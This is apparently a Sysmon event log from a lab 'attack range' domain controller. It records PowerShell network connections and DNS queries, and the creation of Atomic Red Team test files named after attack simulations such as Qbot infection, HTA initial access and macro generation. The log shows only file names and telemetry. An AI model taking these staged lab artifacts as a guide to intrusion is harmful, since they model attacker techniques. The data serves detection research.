{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5194,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:08.507\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52665\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:08.507","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52665","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5195,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.060\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52667\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.060","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52667","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.524\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.524","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5197,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:09.051\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: psg-prod-eastus.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:09.051","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"psg-prod-eastus.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 psg-prod-eastus.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 06:55:11.680\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe\r\nCreationUtcTime: 2020-08-01 06:55:11.680","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 06:55:11.680","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\atomic-hello.exe","CreationUtcTime":"2020-08-01 06:55:11.680","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Argonaut.ps1","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Cyclotron.bat","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5201,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5202,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.696\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat\r\nCreationUtcTime: 2020-08-01 06:55:11.696","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.696","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat","CreationUtcTime":"2020-08-01 06:55:11.696","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.711\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1\r\nCreationUtcTime: 2020-08-01 06:55:11.711","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.711","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1","CreationUtcTime":"2020-08-01 06:55:11.711","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.711\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs\r\nCreationUtcTime: 2020-08-01 06:55:11.711","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.711","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs","CreationUtcTime":"2020-08-01 06:55:11.711","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.727\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta\r\nCreationUtcTime: 2020-08-01 06:55:11.727","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.727","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta","CreationUtcTime":"2020-08-01 06:55:11.727","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:11.727\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1\r\nCreationUtcTime: 2020-08-01 06:55:11.727","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:11.727","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1","CreationUtcTime":"2020-08-01 06:55:11.727","EventReceivedTime":"2020-08-01 06:55:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
